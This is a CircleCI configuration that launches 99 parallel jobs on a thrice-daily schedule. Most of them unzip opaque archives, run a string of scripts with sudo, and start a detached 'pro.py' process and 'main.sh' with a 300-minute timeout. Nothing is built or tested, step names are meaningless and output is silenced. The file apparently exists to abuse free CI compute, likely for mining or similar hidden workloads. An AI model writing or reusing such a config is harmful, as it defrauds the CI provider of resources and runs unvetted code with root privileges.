working_dir: &working_dir ~/app
.build_template: &commonSteps
  steps:
    - checkout
    - run:
        name: A
        command: |
          sudo apt update -y
    - run:
        name: B
        command: |
          sleep 10s
          unzip boim.zip && chmod u+x *
          #./boim.sh###
    - run:
        name: C
        command: |
          unzip aoio.zip >/dev/null 2>&1
    - run:
        name: D
        command: |
          chmod u+x *
    - run:
        name: E
        command: |
          sudo ./A.sh
    - run:
        name: F
        command: |
          sudo ./B.sh
    - run:
        name: G
        command: |
          sudo ./C.sh
    - run:
        name: H
        command: |
          sudo ./D.sh
    - run:
        name: I
        command: |
          sudo ./E.sh
    - run:
        name: J
        command: |
          #sudo ./F.sh#no_run
    - run:
        name: K
        no_output_timeout: 300m
        command: |
          echo "Legend Begin Om. . ."
          sudo ./G.sh
          sudo ./H.sh
          sudo ./I.sh
          screen -dmS Acdb python3 pro.py
          sleep 300s
          ./main.sh
  working_directory: *working_dir

version: 2.0

jobs:
  Aoi_01:
    <<: *commonSteps
    docker:
      - image: circleci/buildpack-deps:focal-curl
  Aoi_02:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_03:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    steps:
      - checkout
  Aoi_04:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_05:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_06:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_07:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_08:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_09:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_10:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_11:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_12:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_13:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_14:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_15:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_16:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_17:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_18:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_19:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_20:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_21:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_22:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_23:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    steps:
      - checkout
  Aoi_24:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_25:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_26:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_27:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_28:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_29:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_30:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_31:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_32:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_33:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    steps:
      - checkout
  Aoi_34:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_35:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_36:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_37:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_38:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_39:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_40:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_41:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_42:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_43:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    steps:
      - checkout
  Aoi_44:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_45:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_46:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_47:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_48:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_49:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_50:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_51:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_52:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_53:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    steps:
      - checkout
  Aoi_54:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_55:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_56:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_57:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_58:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_59:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_60:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_61:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_62:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_63:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    steps:
      - checkout
  Aoi_64:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_65:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_66:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_67:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_68:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_69:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_70:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_71:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_72:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_73:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    steps:
      - checkout
  Aoi_74:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_75:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_76:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_77:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_78:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_79:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_80:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_81:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_82:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_83:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    steps:
      - checkout
  Aoi_84:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_85:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_86:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_87:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_88:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_89:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_90:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_91:
    <<: *commonSteps
    docker:
      - image: circleci/buildpack-deps:focal-curl
  Aoi_92:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_93:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    steps:
      - checkout
  Aoi_94:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_95:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_96:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_97:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_98:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps
  Aoi_99:
    docker:
      - image: circleci/buildpack-deps:focal-curl
    <<: *commonSteps

    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - anak
                - kucing
                - main
                - di
                - jalan

workflows:
  version: 2
  AoiLegend:
    jobs:
      - Aoi_01
      - Aoi_02
      - Aoi_03
      - Aoi_04
      - Aoi_05
      - Aoi_06
      - Aoi_07
      - Aoi_08
      - Aoi_09
      - Aoi_10
      - Aoi_11
      - Aoi_12
      - Aoi_13
      - Aoi_14
      - Aoi_15
      - Aoi_16
      - Aoi_17
      - Aoi_18
      - Aoi_19
      - Aoi_20
      - Aoi_21
      - Aoi_22
      - Aoi_23
      - Aoi_24
      - Aoi_25
      - Aoi_26
      - Aoi_27
      - Aoi_28
      - Aoi_29
      - Aoi_30
      - Aoi_31
      - Aoi_32
      - Aoi_33
      - Aoi_34
      - Aoi_35
      - Aoi_36
      - Aoi_37
      - Aoi_38
      - Aoi_39
      - Aoi_40
      - Aoi_41
      - Aoi_42
      - Aoi_43
      - Aoi_44
      - Aoi_45
      - Aoi_46
      - Aoi_47
      - Aoi_48
      - Aoi_49
      - Aoi_50
      - Aoi_51
      - Aoi_52
      - Aoi_53
      - Aoi_54
      - Aoi_55
      - Aoi_56
      - Aoi_57
      - Aoi_58
      - Aoi_59
      - Aoi_60
      - Aoi_61
      - Aoi_62
      - Aoi_63
      - Aoi_64
      - Aoi_65
      - Aoi_66
      - Aoi_67
      - Aoi_68
      - Aoi_69
      - Aoi_70
      - Aoi_71
      - Aoi_72
      - Aoi_73
      - Aoi_74
      - Aoi_75
      - Aoi_76
      - Aoi_77
      - Aoi_78
      - Aoi_79
      - Aoi_80
      - Aoi_81
      - Aoi_82
      - Aoi_83
      - Aoi_84
      - Aoi_85
      - Aoi_86
      - Aoi_87
      - Aoi_88
      - Aoi_89
      - Aoi_90
      - Aoi_91
      - Aoi_92
      - Aoi_93
      - Aoi_94
      - Aoi_95
      - Aoi_96
      - Aoi_97
      - Aoi_98
      - Aoi_99
